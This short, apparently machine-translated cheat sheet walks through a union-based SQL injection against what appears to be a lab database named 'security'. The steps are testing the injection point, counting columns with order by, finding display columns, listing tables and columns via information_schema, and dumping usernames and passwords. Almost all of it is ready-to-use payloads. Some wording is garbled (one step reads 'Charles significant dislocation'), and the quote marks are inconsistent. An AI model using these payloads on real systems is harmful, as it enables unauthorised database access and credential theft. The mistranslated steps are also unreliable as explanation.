Query id = 1
select * from aa where id=1
Looking for sql injection point
select * from aa where id=1‘ and ’1‘=’1 select * from aa where id=1‘ and ’1‘=’2
Check how many columns
select * from aa where id=1 ‘ order by 3 %23
Charles significant dislocation
select * from aa where id=-1’ union select 1,2,3 %23
Seeking table
?id=-1'%20 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 %23
Seek column
?id=-1'%20 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3 %23
Demand content
?id=-1'%20 union select 1,(select group_concat(username,0x23,password)from security.users),3 %23